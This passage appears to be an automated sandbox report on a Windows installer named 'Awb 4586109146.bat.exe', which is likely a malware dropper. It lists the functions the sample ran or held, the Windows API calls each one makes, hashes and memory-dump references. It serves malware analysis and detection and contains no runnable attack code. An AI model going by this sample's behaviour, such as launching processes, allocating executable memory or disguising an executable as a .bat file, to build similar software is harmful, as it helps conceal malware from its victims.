Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
Opcode Fuzzy Hash: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00010438,00000000,00000000,00000000), ref: 0040428F

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C

Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00404091), ref: 00404274

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48

Function 004058E6 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 004058F5

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Function 00404253 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19

Function 73962AAC Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 73962B6B

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
Instruction ID: 333a699422284168f91b90f30756662820e8c4b9b146b62700231a6cc4389120
Opcode Fuzzy Hash: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
Instruction Fuzzy Hash: 38419FB2807609EFEB21EF65DE417D93769EB04358F30442AE48DCE280D639D8849B93

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000000,0041C000,755723A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
Opcode Fuzzy Hash: aaec09a509645010865dafd0abc3644c3bfecfb7619cc712dd1918ecd69f6dac
Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E

Function 7396121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
Instruction ID: 473050941e88255bdb719725b368d5bfa81f67fe9eae8cea4ed04b31c6f01d2d
Opcode Fuzzy Hash: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
Instruction Fuzzy Hash: E6B012B2A09410EFEF00ABA5CD06F353254E700301F144024F60CCC180C120C8008534

Non-executed Functions

Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404CB6
GetDlgItem.USER32(?,00000408), ref: 00404CC1
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
LoadBitmapW.USER32(0000006E), ref: 00404D1E
SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
DeleteObject.GDI32(00000000), ref: 00404D94
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
ShowWindow.USER32(?,00000005), ref: 00404EEE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
ImageList_Destroy.COMCTL32(?), ref: 004050BE
GlobalFree.KERNEL32(?), ref: 004050CE
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
InvalidateRect.USER32(?,00000000,?), ref: 0040521F
ShowWindow.USER32(?,00000000), ref: 0040526D
GetDlgItem.USER32(?,000003FE), ref: 00405278
ShowWindow.USER32(00000000), ref: 0040527F

Strings

M, xrefs: 00404E48
, xrefs: 00405257
N, xrefs: 00404F29

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58

Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404771
SetWindowTextW.USER32(00000000,?), ref: 0040479B
SHBrowseForFolderW.SHELL32(?), ref: 0040484C
CoTaskMemFree.OLE32(00000000), ref: 00404857
lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
lstrcatW.KERNEL32(?,Call), ref: 00404895
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7

Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917

Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 0040496A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985

Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

Call, xrefs: 00404883, 00404888, 00404893
A, xrefs: 00404845
C:\Users\user\AppData\Local\sillinesses, xrefs: 00404872

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\sillinesses$Call
API String ID: 2624150263-3466314681
Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D

Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

p!C, xrefs: 00407520
p!C, xrefs: 0040743C, 0040745E, 0040750E, 004074E0, 00407463

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
